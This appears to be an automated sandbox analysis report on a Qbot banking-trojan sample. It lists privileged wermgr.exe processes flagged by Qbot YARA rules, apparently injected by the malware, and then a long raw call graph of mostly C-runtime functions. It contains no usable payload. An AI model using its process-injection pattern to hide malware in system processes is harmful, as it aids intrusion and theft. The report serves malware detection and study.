            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

            General

            Target ID:8
            Start time:17:04:44
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\wermgr.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\wermgr.exe
            Imagebase:0x1160000
            File size:191904 bytes
            MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

            General

            Target ID:9
            Start time:17:04:44
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\wermgr.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\wermgr.exe
            Imagebase:0x1160000
            File size:191904 bytes
            MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:1.5%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:2.9%
              Total number of Nodes:2000
              Total number of Limit Nodes:16
              execution_graph 16185 6da919fb 16200 6da99f06 16185->16200 16190 6da91a23 16233 6da91a54 16190->16233 16191 6da91a17 16227 6da94760 16191->16227 16196 6da94760 ___free_lconv_mon 14 API calls 16197 6da91a47 16196->16197 16198 6da94760 ___free_lconv_mon 14 API calls 16197->16198 16199 6da91a4d 16198->16199 16201 6da91a0c 16200->16201 16202 6da99f0f 16200->16202 16206 6da9a221 GetEnvironmentStringsW 16201->16206 16255 6da92c97 16202->16255 16207 6da9a239 16206->16207 16208 6da91a11 16206->16208 16209 6da98f81 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 16207->16209 16208->16190 16208->16191 16210 6da9a256 16209->16210 16211 6da9a26b 16210->16211 16212 6da9a260 FreeEnvironmentStringsW 16210->16212 16213 6da9458b std::_Locinfo::_Locinfo_dtor 15 API calls 16211->16213 16212->16208 16214 6da9a272 16213->16214 16215 6da9a28b 16214->16215 16216 6da9a27a 16214->16216 16218 6da98f81 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 16215->16218 16217 6da94760 ___free_lconv_mon 14 API calls 16216->16217 16219 6da9a27f FreeEnvironmentStringsW 16217->16219 16220 6da9a29b 16218->16220 16219->16208 16221 6da9a2aa 16220->16221 16222 6da9a2a2 16220->16222 16223 6da94760 ___free_lconv_mon 14 API calls 16221->16223 16224 6da94760 ___free_lconv_mon 14 API calls 16222->16224 16225 6da9a2a8 FreeEnvironmentStringsW 16223->16225 16224->16225 16225->16208 16228 6da9476b HeapFree 16227->16228 16232 6da91a1d 16227->16232 16229 6da94780 GetLastError 16228->16229 16228->16232 16230 6da9478d __dosmaperr 16229->16230 16231 6da90403 __dosmaperr 12 API calls 16230->16231 16231->16232 16234 6da91a69 16233->16234 16235 6da9479a __Getctype 14 API calls 16234->16235 16236 6da91a90 16235->16236 16237 6da91a98 16236->16237 16246 6da91aa2 16236->16246 16238 6da94760 ___free_lconv_mon 14 API calls 16237->16238 16254 6da91a2a 16238->16254 16239 6da91aff 16240 6da94760 ___free_lconv_mon 14 API calls 16239->16240 16240->16254 16241 6da9479a __Getctype 14 API calls 16241->16246 16242 6da91b0e 16978 6da91b36 16242->16978 16246->16239 16246->16241 16246->16242 16248 6da91b29 16246->16248 16250 6da94760 ___free_lconv_mon 14 API calls 16246->16250 16969 6da92110 16246->16969 16247 6da94760 ___free_lconv_mon 14 API calls 16249 6da91b1b 16247->16249 16251 6da8daec __Getctype 11 API calls 16248->16251 16252 6da94760 ___free_lconv_mon 14 API calls 16249->16252 16250->16246 16253 6da91b35 16251->16253 16252->16254 16254->16196 16256 6da92ca2 16255->16256 16260 6da92ca8 16255->16260 16303 6da96791 16256->16303 16261 6da92cae 16260->16261 16308 6da967d0 16260->16308 16262 6da92cb3 16261->16262 16325 6da90bf9 16261->16325 16280 6da99d11 16262->16280 16267 6da92cda 16269 6da967d0 __Getctype 6 API calls 16267->16269 16268 6da92cef 16270 6da967d0 __Getctype 6 API calls 16268->16270 16272 6da92ce6 16269->16272 16271 6da92cfb 16270->16271 16273 6da92cff 16271->16273 16274 6da92d0e 16271->16274 16277 6da94760 ___free_lconv_mon 14 API calls 16272->16277 16275 6da967d0 __Getctype 6 API calls 16273->16275 16320 6da929de 16274->16320 16275->16272 16277->16261 16279 6da94760 ___free_lconv_mon 14 API calls 16279->16262 16764 6da99e66 16280->16764 16287 6da99d7b 16789 6da99f61 16287->16789 16288 6da99d6d 16290 6da94760 ___free_lconv_mon 14 API calls 16288->16290 16292 6da99d54 16290->16292 16292->16201 16293 6da99db3 16294 6da90403 __dosmaperr 14 API calls 16293->16294 16295 6da99db8 16294->16295 16298 6da94760 ___free_lconv_mon 14 API calls 16295->16298 16296 6da99dfa 16297 6da99e43 16296->16297 16800 6da99983 16296->16800 16301 6da94760 ___free_lconv_mon 14 API calls 16297->16301 16298->16292 16299 6da99dce 16299->16296 16302 6da94760 ___free_lconv_mon 14 API calls 16299->16302 16301->16292 16302->16296 16336 6da965dd 16303->16336 16305 6da967ad 16306 6da967c8 TlsGetValue 16305->16306 16307 6da967b6 16305->16307 16307->16260 16309 6da965dd std::_Lockit::_Lockit 5 API calls 16308->16309 16310 6da967ec 16309->16310 16311 6da9680a TlsSetValue 16310->16311 16312 6da92cc2 16310->16312 16312->16261 16313 6da9479a 16312->16313 16318 6da947a7 __Getctype 16313->16318 16314 6da947e7 16353 6da90403 16314->16353 16315 6da947d2 RtlAllocateHeap 16316 6da92cd2 16315->16316 16315->16318 16316->16267 16316->16268 16318->16314 16318->16315 16350 6da911a2 16318->16350 16390 6da92872 16320->16390 16532 6da98ccd 16325->16532 16328 6da90c09 16330 6da90c13 IsProcessorFeaturePresent 16328->16330 16335 6da90c32 16328->16335 16332 6da90c1f 16330->16332 16562 6da8d8c3 16332->16562 16568 6da916d2 16335->16568 16337 6da9660b 16336->16337 16338 6da96607 std::_Lockit::_Lockit 16336->16338 16337->16338 16342 6da96512 16337->16342 16338->16305 16341 6da96625 GetProcAddress 16341->16338 16348 6da96523 ___vcrt_FlsFree 16342->16348 16343 6da965b9 16343->16338 16343->16341 16344 6da96541 LoadLibraryExW 16345 6da9655c GetLastError 16344->16345 16346 6da965c0 16344->16346 16345->16348 16346->16343 16347 6da965d2 FreeLibrary 16346->16347 16347->16343 16348->16343 16348->16344 16349 6da9658f LoadLibraryExW 16348->16349 16349->16346 16349->16348 16356 6da911cf 16350->16356 16367 6da92d2d GetLastError 16353->16367 16355 6da90408 16355->16316 16357 6da911db ___scrt_is_nonwritable_in_current_image 16356->16357 16362 6da8fb12 RtlEnterCriticalSection 16357->16362 16359 6da911e6 16363 6da91222 16359->16363 16362->16359 16366 6da8fb5a RtlLeaveCriticalSection 16363->16366 16365 6da911ad 16365->16318 16366->16365 16368 6da92d43 16367->16368 16371 6da92d49 16367->16371 16369 6da96791 __Getctype 6 API calls 16368->16369 16369->16371 16370 6da967d0 __Getctype 6 API calls 16372 6da92d65 16370->16372 16371->16370 16387 6da92d4d SetLastError 16371->16387 16374 6da9479a __Getctype 12 API calls 16372->16374 16372->16387 16375 6da92d7a 16374->16375 16376 6da92d93 16375->16376 16377 6da92d82 16375->16377 16379 6da967d0 __Getctype 6 API calls 16376->16379 16378 6da967d0 __Getctype 6 API calls 16377->16378 16381 6da92d90 16378->16381 16380 6da92d9f 16379->16380 16382 6da92dba 16380->16382 16383 6da92da3 16380->16383 16385 6da94760 ___free_lconv_mon 12 API calls 16381->16385 16386 6da929de __Getctype 12 API calls 16382->16386 16384 6da967d0 __Getctype 6 API calls 16383->16384 16384->16381 16385->16387 16388 6da92dc5 16386->16388 16387->16355 16389 6da94760 ___free_lconv_mon 12 API calls 16388->16389 16389->16387 16391 6da9287e ___scrt_is_nonwritable_in_current_image 16390->16391 16404 6da8fb12 RtlEnterCriticalSection 16391->16404 16393 6da92888 16405 6da928b8 16393->16405 16396 6da92984 16397 6da92990 ___scrt_is_nonwritable_in_current_image 16396->16397 16409 6da8fb12 RtlEnterCriticalSection 16397->16409 16399 6da9299a 16410 6da92b65 16399->16410 16401 6da929b2 16414 6da929d2 16401->16414 16404->16393 16408 6da8fb5a RtlLeaveCriticalSection 16405->16408 16407 6da928a6 16407->16396 16408->16407 16409->16399 16411 6da92b9b __Getctype 16410->16411 16412 6da92b74 __Getctype 16410->16412 16411->16401 16412->16411 16417 6da9a76c 16412->16417 16531 6da8fb5a RtlLeaveCriticalSection 16414->16531 16416 6da929c0 16416->16279 16418 6da9a7ec 16417->16418 16421 6da9a782 16417->16421 16420 6da94760 ___free_lconv_mon 14 API calls 16418->16420 16443 6da9a83a 16418->16443 16422 6da9a80e 16420->16422 16421->16418 16423 6da9a7b5 16421->16423 16427 6da94760 ___free_lconv_mon 14 API calls 16421->16427 16424 6da94760 ___free_lconv_mon 14 API calls 16422->16424 16431 6da94760 ___free_lconv_mon 14 API calls 16423->16431 16444 6da9a7d7 16423->16444 16425 6da9a821 16424->16425 16430 6da94760 ___free_lconv_mon 14 API calls 16425->16430 16426 6da94760 ___free_lconv_mon 14 API calls 16432 6da9a7e1 16426->16432 16429 6da9a7aa 16427->16429 16428 6da9a848 16433 6da9a8a8 16428->16433 16434 6da94760 14 API calls ___free_lconv_mon 16428->16434 16445 6da9aa89 16429->16445 16436 6da9a82f 16430->16436 16437 6da9a7cc 16431->16437 16438 6da94760 ___free_lconv_mon 14 API calls 16432->16438 16439 6da94760 ___free_lconv_mon 14 API calls 16433->16439 16434->16428 16441 6da94760 ___free_lconv_mon 14 API calls 16436->16441 16473 6da9af3d 16437->16473 16438->16418 16440 6da9a8ae 16439->16440 16440->16411 16441->16443 16485 6da9a8dd 16443->16485 16444->16426 16446 6da9aa9a 16445->16446 16472 6da9ab83 16445->16472 16448 6da9aaab 16446->16448 16449 6da94760 ___free_lconv_mon 14 API calls 16446->16449 16447 6da9aabd 16451 6da9aacf 16447->16451 16452 6da94760 ___free_lconv_mon 14 API calls 16447->16452 16448->16447 16450 6da94760 ___free_lconv_mon 14 API calls 16448->16450 16449->16448 16450->16447 16453 6da9aae1 16451->16453 16454 6da94760 ___free_lconv_mon 14 API calls 16451->16454 16452->16451 16455 6da9aaf3 16453->16455 16457 6da94760 ___free_lconv_mon 14 API calls 16453->16457 16454->16453 16456 6da9ab05 16455->16456 16458 6da94760 ___free_lconv_mon 14 API calls 16455->16458 16459 6da9ab17 16456->16459 16460 6da94760 ___free_lconv_mon 14 API calls 16456->16460 16457->16455 16458->16456 16461 6da9ab29 16459->16461 16462 6da94760 ___free_lconv_mon 14 API calls 16459->16462 16460->16459 16463 6da9ab3b 16461->16463 16465 6da94760 ___free_lconv_mon 14 API calls 16461->16465 16462->16461 16464 6da9ab4d 16463->16464 16466 6da94760 ___free_lconv_mon 14 API calls 16463->16466 16467 6da9ab5f 16464->16467 16468 6da94760 ___free_lconv_mon 14 API calls 16464->16468 16465->16463 16466->16464 16469 6da9ab71 16467->16469 16470 6da94760 ___free_lconv_mon 14 API calls 16467->16470 16468->16467 16471 6da94760 ___free_lconv_mon 14 API calls 16469->16471 16469->16472 16470->16469 16471->16472 16472->16423 16474 6da9af4a 16473->16474 16484 6da9afa2 16473->16484 16475 6da9af5a 16474->16475 16476 6da94760 ___free_lconv_mon 14 API calls 16474->16476 16477 6da94760 ___free_lconv_mon 14 API calls 16475->16477 16478 6da9af6c 16475->16478 16476->16475 16477->16478 16479 6da9af7e 16478->16479 16480 6da94760 ___free_lconv_mon 14 API calls 16478->16480 16481 6da9af90 16479->16481 16482 6da94760 ___free_lconv_mon 14 API calls 16479->16482 16480->16479 16483 6da94760 ___free_lconv_mon 14 API calls 16481->16483 16481->16484 16482->16481 16483->16484 16484->16444 16486 6da9a8ea 16485->16486 16490 6da9a909 16485->16490 16486->16490 16491 6da9b458 16486->16491 16489 6da94760 ___free_lconv_mon 14 API calls 16489->16490 16490->16428 16492 6da9a903 16491->16492 16493 6da9b469 16491->16493 16492->16489 16527 6da9b1b7 16493->16527 16496 6da9b1b7 __Getctype 14 API calls 16497 6da9b47c 16496->16497 16498 6da9b1b7 __Getctype 14 API calls 16497->16498 16499 6da9b487 16498->16499 16500 6da9b1b7 __Getctype 14 API calls 16499->16500 16501 6da9b492 16500->16501 16502 6da9b1b7 __Getctype 14 API calls 16501->16502 16503 6da9b4a0 16502->16503 16504 6da94760 ___free_lconv_mon 14 API calls 16503->16504 16505 6da9b4ab 16504->16505 16506 6da94760 ___free_lconv_mon 14 API calls 16505->16506 16507 6da9b4b6 16506->16507 16508 6da94760 ___free_lconv_mon 14 API calls 16507->16508 16509 6da9b4c1 16508->16509 16510 6da9b1b7 __Getctype 14 API calls 16509->16510 16511 6da9b4cf 16510->16511 16512 6da9b1b7 __Getctype 14 API calls 16511->16512 16513 6da9b4dd 16512->16513 16514 6da9b1b7 __Getctype 14 API calls 16513->16514 16515 6da9b4ee 16514->16515 16516 6da9b1b7 __Getctype 14 API calls 16515->16516 16517 6da9b4fc 16516->16517 16518 6da9b1b7 __Getctype 14 API calls 16517->16518 16519 6da9b50a 16518->16519 16520 6da94760 ___free_lconv_mon 14 API calls 16519->16520 16521 6da9b515 16520->16521 16522 6da94760 ___free_lconv_mon 14 API calls 16521->16522 16523 6da9b520 16522->16523 16524 6da94760 ___free_lconv_mon 14 API calls 16523->16524 16525 6da9b52b 16524->16525 16526 6da94760 ___free_lconv_mon 14 API calls 16525->16526 16526->16492 16528 6da9b1c9 16527->16528 16529 6da9b1d8 16528->16529 16530 6da94760 ___free_lconv_mon 14 API calls 16528->16530 16529->16496 16530->16528 16531->16416 16571 6da98bff 16532->16571 16535 6da98d12 16536 6da98d1e ___scrt_is_nonwritable_in_current_image 16535->16536 16537 6da92d2d __dosmaperr 14 API calls 16536->16537 16542 6da98d4b IsInExceptionSpec 16536->16542 16545 6da98d45 IsInExceptionSpec 16536->16545 16537->16545 16538 6da98d92 16540 6da90403 __dosmaperr 14 API calls 16538->16540 16539 6da98d7c 16539->16328 16541 6da98d97 16540->16541 16582 6da8dabf 16541->16582 16544 6da98dbe 16542->16544 16585 6da8fb12 RtlEnterCriticalSection 16542->16585 16548 6da98ef1 16544->16548 16549 6da98e00 16544->16549 16560 6da98e2f 16544->16560 16545->16538 16545->16539 16545->16542 16550 6da98efc 16548->16550 16617 6da8fb5a RtlLeaveCriticalSection 16548->16617 16549->16560 16586 6da92bdc GetLastError 16549->16586 16553 6da916d2 IsInExceptionSpec 23 API calls 16550->16553 16555 6da98f04 16553->16555 16557 6da92bdc __Getctype 41 API calls 16558 6da98e84 16557->16558 16558->16539 16561 6da92bdc __Getctype 41 API calls 16558->16561 16559 6da92bdc __Getctype 41 API calls 16559->16560 16613 6da98e9e 16560->16613 16561->16539 16563 6da8d8df IsInExceptionSpec 16562->16563 16564 6da8d90b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16563->16564 16567 6da8d9dc IsInExceptionSpec 16564->16567 16566 6da8d9fa 16566->16335 16682 6da89b91 16567->16682 16690 6da91505 16568->16690 16572 6da98c0b ___scrt_is_nonwritable_in_current_image 16571->16572 16577 6da8fb12 RtlEnterCriticalSection 16572->16577 16574 6da98c19 16578 6da98c57 16574->16578 16577->16574 16581 6da8fb5a RtlLeaveCriticalSection 16578->16581 16580 6da90bfe 16580->16328 16580->16535 16581->16580 16618 6da8da0b 16582->16618 16585->16544 16587 6da92bf8 16586->16587 16588 6da92bf2 16586->16588 16589 6da967d0 __Getctype 6 API calls 16587->16589 16592 6da92bfc SetLastError 16587->16592 16590 6da96791 __Getctype 6 API calls 16588->16590 16591 6da92c14 16589->16591 16590->16587 16591->16592 16594 6da9479a __Getctype 14 API calls 16591->16594 16596 6da92c8c 16592->16596 16597 6da92c91 16592->16597 16595 6da92c29 16594->16595 16598 6da92c31 16595->16598 16599 6da92c42 16595->16599 16596->16559 16600 6da90bf9 IsInExceptionSpec 39 API calls 16597->16600 16601 6da967d0 __Getctype 6 API calls 16598->16601 16602 6da967d0 __Getctype 6 API calls 16599->16602 16603 6da92c96 16600->16603 16611 6da92c3f 16601->16611 16604 6da92c4e 16602->16604 16605 6da92c69 16604->16605 16606 6da92c52 16604->16606 16608 6da929de __Getctype 14 API calls 16605->16608 16609 6da967d0 __Getctype 6 API calls 16606->16609 16607 6da94760 ___free_lconv_mon 14 API calls 16607->16592 16610 6da92c74 16608->16610 16609->16611 16612 6da94760 ___free_lconv_mon 14 API calls 16610->16612 16611->16607 16612->16592 16614 6da98e75 16613->16614 16615 6da98ea4 16613->16615 16614->16539 16614->16557 16614->16558 16681 6da8fb5a RtlLeaveCriticalSection 16615->16681 16617->16550 16619 6da8da1d ___std_exception_copy 16618->16619 16624 6da8da42 16619->16624 16621 6da8da35 16635 6da8d7fb 16621->16635 16625 6da8da59 16624->16625 16626 6da8da52 16624->16626 16629 6da8da67 16625->16629 16645 6da8d837 16625->16645 16641 6da8d860 GetLastError 16626->16641 16629->16621 16630 6da8da8e 16630->16629 16648 6da8daec IsProcessorFeaturePresent 16630->16648 16632 6da8dabe 16633 6da8da0b ___std_exception_copy 41 API calls 16632->16633 16634 6da8dacb 16633->16634 16634->16621 16636 6da8d807 16635->16636 16638 6da8d81e 16636->16638 16674 6da8d8a6 16636->16674 16639 6da8d8a6 ___std_exception_copy 41 API calls 16638->16639 16640 6da8d831 16638->16640 16639->16640 16640->16539 16642 6da8d879 16641->16642 16652 6da92dde 16642->16652 16646 6da8d85b 16645->16646 16647 6da8d842 GetLastError SetLastError 16645->16647 16646->16630 16647->16630 16649 6da8daf8 16648->16649 16650 6da8d8c3 IsInExceptionSpec 8 API calls 16649->16650 16651 6da8db0d GetCurrentProcess TerminateProcess 16650->16651 16651->16632 16653 6da92df1 16652->16653 16656 6da92df7 16652->16656 16654 6da96791 __Getctype 6 API calls 16653->16654 16654->16656 16655 6da967d0 __Getctype 6 API calls 16657 6da92e11 16655->16657 16656->16655 16673 6da8d891 SetLastError 16656->16673 16658 6da9479a __Getctype 14 API calls 16657->16658 16657->16673 16659 6da92e21 16658->16659 16660 6da92e29 16659->16660 16661 6da92e3e 16659->16661 16662 6da967d0 __Getctype 6 API calls 16660->16662 16663 6da967d0 __Getctype 6 API calls 16661->16663 16664 6da92e35 16662->16664 16665 6da92e4a 16663->16665 16668 6da94760 ___free_lconv_mon 14 API calls 16664->16668 16666 6da92e5d 16665->16666 16667 6da92e4e 16665->16667 16670 6da929de __Getctype 14 API calls 16666->16670 16669 6da967d0 __Getctype 6 API calls 16667->16669 16668->16673 16669->16664 16671 6da92e68 16670->16671 16672 6da94760 ___free_lconv_mon 14 API calls 16671->16672 16672->16673 16673->16625 16675 6da8d8b9 16674->16675 16676 6da8d8b0 16674->16676 16675->16638 16677 6da8d860 ___std_exception_copy 16 API calls 16676->16677 16678 6da8d8b5 16677->16678 16678->16675 16679 6da90bf9 IsInExceptionSpec 41 API calls 16678->16679 16680 6da8d8c2 16679->16680 16681->16614 16683 6da89b99 16682->16683 16684 6da89b9a IsProcessorFeaturePresent 16682->16684 16683->16566 16686 6da8a15a 16684->16686 16689 6da8a11d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16686->16689 16688 6da8a23d 16688->16566 16689->16688 16691 6da91532 16690->16691 16692 6da91543 16690->16692 16701 6da915cd GetModuleHandleW 16691->16701 16708 6da913cd 16692->16708 16697 6da90c3c 16702 6da91537 16701->16702 16702->16692 16703 6da91632 GetModuleHandleExW 16702->16703 16704 6da91671 GetProcAddress 16703->16704 16705 6da91685 16703->16705 16704->16705 16706 6da91698 FreeLibrary 16705->16706 16707 6da916a1 16705->16707 16706->16707 16707->16692 16709 6da913d9 ___scrt_is_nonwritable_in_current_image 16708->16709 16723 6da8fb12 RtlEnterCriticalSection 16709->16723 16711 6da913e3 16724 6da9141a 16711->16724 16713 6da913f0 16728 6da9140e 16713->16728 16716 6da9159c 16752 6da91610 16716->16752 16719 6da915ba 16721 6da91632 IsInExceptionSpec 3 API calls 16719->16721 16720 6da915aa GetCurrentProcess TerminateProcess 16720->16719 16722 6da915c2 ExitProcess 16721->16722 16723->16711 16725 6da91426 ___scrt_is_nonwritable_in_current_image 16724->16725 16727 6da9148d IsInExceptionSpec 16725->16727 16731 6da91eb8 16725->16731 16727->16713 16751 6da8fb5a RtlLeaveCriticalSection 16728->16751 16730 6da913fc 16730->16697 16730->16716 16732 6da91ec4 __EH_prolog3 16731->16732 16735 6da91bf1 16732->16735 16734 6da91eeb std::locale::_Init 16734->16727 16736 6da91bfd ___scrt_is_nonwritable_in_current_image 16735->16736 16743 6da8fb12 RtlEnterCriticalSection 16736->16743 16738 6da91c0b 16744 6da91dc8 16738->16744 16743->16738 16745 6da91c18 16744->16745 16746 6da91de7 16744->16746 16748 6da91c40 16745->16748 16746->16745 16747 6da94760 ___free_lconv_mon 14 API calls 16746->16747 16747->16745 16749 6da8fb5a std::_Lockit::~_Lockit RtlLeaveCriticalSection 16748->16749 16750 6da91c29 16749->16750 16750->16734 16751->16730 16757 6da99229 GetPEB 16752->16757 16755 6da9161a GetPEB 16756 6da915a6 16755->16756 16756->16719 16756->16720 16758 6da99243 16757->16758 16759 6da91615 16757->16759 16761 6da96660 16758->16761 16759->16755 16759->16756 16762 6da965dd std::_Lockit::_Lockit 5 API calls 16761->16762 16763 6da9667c 16762->16763 16763->16759 16765 6da99e72 ___scrt_is_nonwritable_in_current_image 16764->16765 16766 6da99e8c 16765->16766 16808 6da8fb12 RtlEnterCriticalSection 16765->16808 16769 6da99d3b 16766->16769 16771 6da90bf9 IsInExceptionSpec 41 API calls 16766->16771 16768 6da99ec8 16809 6da99ee5 16768->16809 16775 6da99a91 16769->16775 16773 6da99f05 16771->16773 16772 6da99e9c 16772->16768 16774 6da94760 ___free_lconv_mon 14 API calls 16772->16774 16774->16768 16813 6da90416 16775->16813 16778 6da99ab2 GetOEMCP 16780 6da99adb 16778->16780 16779 6da99ac4 16779->16780 16781 6da99ac9 GetACP 16779->16781 16780->16292 16782 6da9458b 16780->16782 16781->16780 16783 6da945c9 16782->16783 16787 6da94599 __Getctype 16782->16787 16784 6da90403 __dosmaperr 14 API calls 16783->16784 16786 6da945c7 16784->16786 16785 6da945b4 RtlAllocateHeap 16785->16786 16785->16787 16786->16287 16786->16288 16787->16783 16787->16785 16788 6da911a2 std::_Facet_Register 2 API calls 16787->16788 16788->16787 16790 6da99a91 43 API calls 16789->16790 16791 6da99f81 16790->16791 16793 6da99fbe IsValidCodePage 16791->16793 16797 6da99ffa IsInExceptionSpec 16791->16797 16792 6da89b91 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16794 6da99da8 16792->16794 16795 6da99fd0 16793->16795 16793->16797 16794->16293 16794->16299 16796 6da99fff GetCPInfo 16795->16796 16799 6da99fd9 IsInExceptionSpec 16795->16799 16796->16797 16796->16799 16797->16792 16856 6da99b65 16799->16856 16801 6da9998f ___scrt_is_nonwritable_in_current_image 16800->16801 16943 6da8fb12 RtlEnterCriticalSection 16801->16943 16803 6da99999 16944 6da999d0 16803->16944 16808->16772 16812 6da8fb5a RtlLeaveCriticalSection 16809->16812 16811 6da99eec 16811->16766 16812->16811 16814 6da9042d 16813->16814 16815 6da90434 16813->16815 16814->16778 16814->16779 16815->16814 16816 6da92bdc __Getctype 41 API calls 16815->16816 16817 6da90455 16816->16817 16821 6da946a4 16817->16821 16822 6da946b7 16821->16822 16824 6da9046b 16821->16824 16822->16824 16829 6da9a9b8 16822->16829 16825 6da94702 16824->16825 16826 6da9472a 16825->16826 16827 6da94715 16825->16827 16826->16814 16827->16826 16851 6da99f4e 16827->16851 16830 6da9a9c4 ___scrt_is_nonwritable_in_current_image 16829->16830 16831 6da92bdc __Getctype 41 API calls 16830->16831 16832 6da9a9cd 16831->16832 16833 6da9aa13 16832->16833 16842 6da8fb12 RtlEnterCriticalSection 16832->16842 16833->16824 16835 6da9a9eb 16843 6da9aa39 16835->16843 16840 6da90bf9 IsInExceptionSpec 41 API calls 16841 6da9aa38 16840->16841 16842->16835 16844 6da9a9fc 16843->16844 16845 6da9aa47 __Getctype 16843->16845 16847 6da9aa18 16844->16847 16845->16844 16846 6da9a76c __Getctype 14 API calls 16845->16846 16846->16844 16850 6da8fb5a RtlLeaveCriticalSection 16847->16850 16849 6da9aa0f 16849->16833 16849->16840 16850->16849 16852 6da92bdc __Getctype 41 API calls 16851->16852 16853 6da99f53 16852->16853 16854 6da99e66 std::_Locinfo::_Locinfo_dtor 41 API calls 16853->16854 16855 6da99f5e 16854->16855 16855->16826 16857 6da99b8d GetCPInfo 16856->16857 16866 6da99c56 16856->16866 16858 6da99ba5 16857->16858 16857->16866 16867 6da973ab 16858->16867 16860 6da89b91 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16861 6da99d0f 16860->16861 16861->16797 16865 6da976a2 45 API calls 16865->16866 16866->16860 16868 6da90416 std::_Locinfo::_Locinfo_dtor 41 API calls 16867->16868 16869 6da973cb 16868->16869 16887 6da98f05 16869->16887 16871 6da973f8 16872 6da97487 16871->16872 16873 6da9748f 16871->16873 16876 6da9458b std::_Locinfo::_Locinfo_dtor 15 API calls 16871->16876 16878 6da9741d IsInExceptionSpec __alloca_probe_16 16871->16878 16890 6da8937b 16872->16890 16874 6da89b91 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16873->16874 16877 6da974b2 16874->16877 16876->16878 16882 6da976a2 16877->16882 16878->16872 16879 6da98f05 std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 16878->16879 16880 6da97468 16879->16880 16880->16872 16881 6da97473 GetStringTypeW 16880->16881 16881->16872 16883 6da90416 std::_Locinfo::_Locinfo_dtor 41 API calls 16882->16883 16884 6da976b5 16883->16884 16897 6da974b4 16884->16897 16889 6da98f16 MultiByteToWideChar 16887->16889 16889->16871 16891 6da89385 16890->16891 16892 6da89396 16890->16892 16891->16892 16894 6da8dcf4 16891->16894 16892->16873 16895 6da94760 ___free_lconv_mon 14 API calls 16894->16895 16896 6da8dd0c 16895->16896 16896->16892 16898 6da974cf 16897->16898 16899 6da98f05 std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 16898->16899 16903 6da97515 16899->16903 16900 6da9768d 16901 6da89b91 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16900->16901 16902 6da976a0 16901->16902 16902->16865 16903->16900 16904 6da9458b std::_Locinfo::_Locinfo_dtor 15 API calls 16903->16904 16906 6da9753b __alloca_probe_16 16903->16906 16913 6da975c1 16903->16913 16904->16906 16905 6da8937b __freea 14 API calls 16905->16900 16907 6da98f05 std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 16906->16907 16906->16913 16908 6da97580 16907->16908 16908->16913 16925 6da9694f 16908->16925 16911 6da975ea 16914 6da97675 16911->16914 16915 6da9458b std::_Locinfo::_Locinfo_dtor 15 API calls 16911->16915 16918 6da975fc __alloca_probe_16 16911->16918 16912 6da975b2 16912->16913 16917 6da9694f std::_Locinfo::_Locinfo_dtor 6 API calls 16912->16917 16913->16905 16916 6da8937b __freea 14 API calls 16914->16916 16915->16918 16916->16913 16917->16913 16918->16914 16919 6da9694f std::_Locinfo::_Locinfo_dtor 6 API calls 16918->16919 16920 6da9763f 16919->16920 16920->16914 16931 6da98f81 